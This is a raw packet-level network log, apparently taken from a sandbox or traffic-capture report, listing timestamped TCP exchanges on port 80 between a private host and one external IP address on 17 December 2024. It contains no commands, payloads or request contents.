                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.306157112 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.306190014 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.306200981 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.307326078 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.307367086 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.307502985 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.307552099 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.308238029 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.308284044 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.308379889 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.308423996 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.309113026 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.309175968 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.309269905 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.309312105 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.309885025 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.309940100 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.310029030 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.310076952 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.310832977 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.310909033 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.311139107 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.311192036 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.311887980 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.311904907 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.311969042 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.312689066 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.312700987 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.312741995 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.312769890 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.313453913 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.313503027 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.313610077 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.313656092 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.314426899 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.314534903 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.314590931 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.314644098 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.315382004 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.315444946 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.315557003 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.315604925 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.316363096 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.316421032 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.316519976 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.316566944 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.317487955 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.317560911 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.317648888 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.317754984 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.318298101 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.318350077 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.318483114 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.318531036 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.319123983 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.319174051 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.319308996 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.319356918 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.319838047 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.319889069 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.319997072 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.320039988 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.320599079 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.320651054 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.320760012 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.320812941 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.408375978 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.408510923 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.408660889 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.408706903 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.408859968 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.408904076 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.409029007 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.409071922 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.410015106 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.410059929 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.410159111 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.410202980 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.410854101 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.410896063 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.469540119 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.469599009 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.469679117 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.469728947 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.470024109 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.470063925 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.470221043 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.470258951 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.470417976 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.470431089 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.470454931 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.470474958 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.470822096 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.470866919 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.471007109 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.471044064 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.471707106 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.471750021 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.471791983 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.471827984 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.472624063 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.472666979 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.472743988 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.472779036 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.473526001 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.473563910 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.473686934 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.473721981 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.474324942 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.474374056 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.474401951 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.474438906 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.475248098 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.475297928 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.475404024 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.475482941 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.476073980 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.476125002 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.476253033 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.476301908 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.477005005 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.477056980 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.477111101 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.477150917 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.477859974 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.477904081 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.477966070 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.478003979 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.478730917 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.478773117 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.478882074 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.478921890 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.479643106 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.479681015 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.479684114 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.479712963 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.480487108 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.480545044 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.480588913 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.480660915 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.481349945 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.481409073 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.481452942 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.481488943 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.482286930 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.482327938 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.482367992 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.482402086 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.483125925 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.483172894 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.483232975 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.483274937 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.484050035 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.484093904 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.484164953 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.484200954 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.484899044 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.484936953 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.484992981 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.485024929 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.485769033 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.485841990 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.485872984 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.485905886 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.486686945 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.486726999 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.486783981 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.486814976 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.487528086 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.487581968 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.487653017 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.487685919 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.488435030 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.488470078 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.488478899 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.488509893 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.489403963 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.489447117 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.489507914 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.489543915 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.490309954 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.490331888 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.490355968 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.490371943 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.491092920 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.491121054 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.491214991 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.491256952 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.491925001 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.491977930 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.492007017 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.492047071 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.492841959 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.492896080 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.492930889 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.492965937 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.493700981 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.493741035 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.493858099 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.493892908 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.494569063 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.494606972 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.494827986 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.494864941 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.495466948 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.495507956 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.495542049 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.495577097 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.496334076 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.496375084 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.496434927 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.496656895 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.497366905 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.497407913 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.497519016 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.497550964 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.498187065 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.498226881 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.498330116 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.498368979 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.498975992 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.499011993 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.499066114 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.499111891 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.499864101 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.499917030 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.500050068 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.500087976 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.500991106 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.501039028 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.501080990 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.501116037 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.501648903 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.501687050 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.501780987 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.501816988 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.502559900 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.502598047 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.502693892 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.502732038 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.503479958 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.503520012 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.503530025 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.503563881 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.504276991 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.504312992 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.504375935 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.504415035 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.505139112 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.505191088 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.505218029 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.505251884 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.506061077 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.506113052 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.506134033 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.506169081 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.506921053 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.506966114 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.507076025 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.507116079 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.507817030 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.507863998 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.507879972 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.507914066 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.508734941 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.508774042 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.508780956 CET8049738138.124.60.133192.168.2.4
